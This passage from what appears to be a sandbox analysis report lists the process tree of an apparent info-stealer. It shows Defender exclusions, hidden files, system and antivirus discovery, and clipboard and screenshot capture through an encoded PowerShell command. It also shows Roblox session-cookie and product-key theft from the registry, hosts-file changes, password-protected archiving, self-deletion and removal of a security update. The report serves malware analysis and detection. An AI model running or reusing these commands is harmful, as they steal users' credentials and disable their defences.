                                            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                            5⤵
                                              PID:344
                                              • C:\Windows\system32\reg.exe
                                                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                6⤵
                                                  PID:1108
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                5⤵
                                                  PID:4224
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic path win32_VideoController get name
                                                    6⤵
                                                    • Detects videocard installed
                                                    PID:1028
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                  5⤵
                                                    PID:2112
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic path win32_VideoController get name
                                                      6⤵
                                                      • Detects videocard installed
                                                      PID:364
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe""
                                                    5⤵
                                                    • Hide Artifacts: Hidden Files and Directories
                                                    PID:1636
                                                    • C:\Windows\system32\attrib.exe
                                                      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Built.exe"
                                                      6⤵
                                                      • Views/modifies file attributes
                                                      PID:5036
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​​  .scr'"
                                                    5⤵
                                                      PID:3004
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ​​  .scr'
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        PID:1108
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                      5⤵
                                                        PID:544
                                                        • C:\Windows\system32\tasklist.exe
                                                          tasklist /FO LIST
                                                          6⤵
                                                          • Enumerates processes with tasklist
                                                          PID:4992
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                        5⤵
                                                          PID:2188
                                                          • C:\Windows\system32\tasklist.exe
                                                            tasklist /FO LIST
                                                            6⤵
                                                            • Enumerates processes with tasklist
                                                            PID:1400
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                          5⤵
                                                            PID:3232
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                              6⤵
                                                                PID:8
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                              5⤵
                                                              • Clipboard Data
                                                              PID:3916
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-Clipboard
                                                                6⤵
                                                                • Clipboard Data
                                                                PID:4676
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                              5⤵
                                                                PID:4316
                                                                • C:\Windows\system32\tasklist.exe
                                                                  tasklist /FO LIST
                                                                  6⤵
                                                                  • Enumerates processes with tasklist
                                                                  PID:4428
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                5⤵
                                                                  PID:1840
                                                                  • C:\Windows\system32\tree.com
                                                                    tree /A /F
                                                                    6⤵
                                                                      PID:3944
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                    5⤵
                                                                    • System Network Configuration Discovery: Wi-Fi Discovery
                                                                    PID:1112
                                                                    • C:\Windows\system32\netsh.exe
                                                                      netsh wlan show profile
                                                                      6⤵
                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                      • System Network Configuration Discovery: Wi-Fi Discovery
                                                                      PID:3424
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                    5⤵
                                                                      PID:4044
                                                                      • C:\Windows\system32\systeminfo.exe
                                                                        systeminfo
                                                                        6⤵
                                                                        • Gathers system information
                                                                        PID:5104
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                      5⤵
                                                                        PID:2248
                                                                        • C:\Windows\system32\reg.exe
                                                                          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                          6⤵
                                                                            PID:1832
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                          5⤵
                                                                            PID:1948
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                              6⤵
                                                                                PID:2400
                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4tbyaxz2\4tbyaxz2.cmdline"
                                                                                  7⤵
                                                                                    PID:1128
                                                                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9477.tmp" "c:\Users\Admin\AppData\Local\Temp\4tbyaxz2\CSC3FE9622E83E945B3BBE9103D2457C7F6.TMP"
                                                                                      8⤵
                                                                                        PID:4512
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                  5⤵
                                                                                    PID:3664
                                                                                    • C:\Windows\system32\tree.com
                                                                                      tree /A /F
                                                                                      6⤵
                                                                                        PID:8
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                      5⤵
                                                                                        PID:808
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                          6⤵
                                                                                          • Drops file in Drivers directory
                                                                                          • Views/modifies file attributes
                                                                                          PID:1016
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                        5⤵
                                                                                          PID:1112
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            6⤵
                                                                                              PID:344
                                                                                            • C:\Windows\system32\tree.com
                                                                                              tree /A /F
                                                                                              6⤵
                                                                                                PID:4676
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                              5⤵
                                                                                                PID:1788
                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                  6⤵
                                                                                                  • Drops file in Drivers directory
                                                                                                  • Views/modifies file attributes
                                                                                                  PID:3192
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                5⤵
                                                                                                  PID:4192
                                                                                                  • C:\Windows\system32\tree.com
                                                                                                    tree /A /F
                                                                                                    6⤵
                                                                                                      PID:1180
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                    5⤵
                                                                                                      PID:1092
                                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                                        tasklist /FO LIST
                                                                                                        6⤵
                                                                                                        • Enumerates processes with tasklist
                                                                                                        PID:4380
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                      5⤵
                                                                                                        PID:4512
                                                                                                        • C:\Windows\system32\tree.com
                                                                                                          tree /A /F
                                                                                                          6⤵
                                                                                                            PID:3628
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                          5⤵
                                                                                                            PID:4844
                                                                                                            • C:\Windows\system32\tree.com
                                                                                                              tree /A /F
                                                                                                              6⤵
                                                                                                                PID:5020
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                              5⤵
                                                                                                                PID:5088
                                                                                                                • C:\Windows\system32\getmac.exe
                                                                                                                  getmac
                                                                                                                  6⤵
                                                                                                                    PID:4528
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1268"
                                                                                                                  5⤵
                                                                                                                    PID:5800
                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                      taskkill /F /PID 1268
                                                                                                                      6⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:2500
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1268"
                                                                                                                    5⤵
                                                                                                                      PID:5176
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        6⤵
                                                                                                                          PID:1788
                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                          taskkill /F /PID 1268
                                                                                                                          6⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          PID:2116
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                        5⤵
                                                                                                                          PID:4296
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                            6⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:4760
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                          5⤵
                                                                                                                            PID:5816
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                              6⤵
                                                                                                                                PID:1876
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI37042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\eWeUb.zip" *"
                                                                                                                              5⤵
                                                                                                                                PID:5936
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\_MEI37042\rar.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\_MEI37042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\eWeUb.zip" *
                                                                                                                                  6⤵
                                                                                                                                    PID:944
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                                  5⤵
                                                                                                                                    PID:5176
                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                      wmic os get Caption
                                                                                                                                      6⤵
                                                                                                                                        PID:5664
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                      5⤵
                                                                                                                                        PID:2044
                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                          wmic computersystem get totalphysicalmemory
                                                                                                                                          6⤵
                                                                                                                                            PID:3676
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                          5⤵
                                                                                                                                            PID:5688
                                                                                                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                              wmic csproduct get uuid
                                                                                                                                              6⤵
                                                                                                                                                PID:1640
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                              5⤵
                                                                                                                                                PID:3432
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                  6⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  PID:2960
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                5⤵
                                                                                                                                                  PID:512
                                                                                                                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                    wmic path win32_VideoController get name
                                                                                                                                                    6⤵
                                                                                                                                                    • Detects videocard installed
                                                                                                                                                    PID:8
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                  5⤵
                                                                                                                                                    PID:560
                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                      6⤵
                                                                                                                                                        PID:2136
                                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""
                                                                                                                                                      5⤵
                                                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                      PID:3228
                                                                                                                                                      • C:\Windows\system32\PING.EXE
                                                                                                                                                        ping localhost -n 3
                                                                                                                                                        6⤵
                                                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                        • Runs ping.exe
                                                                                                                                                        PID:5884
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\onedrive.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\onedrive.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  PID:3948
                                                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                    4⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    PID:4232
                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                    4⤵
                                                                                                                                                      PID:2152
                                                                                                                                                      • C:\Windows\system32\wusa.exe
                                                                                                                                                        wusa /uninstall /kb:890830 /quiet /norestart
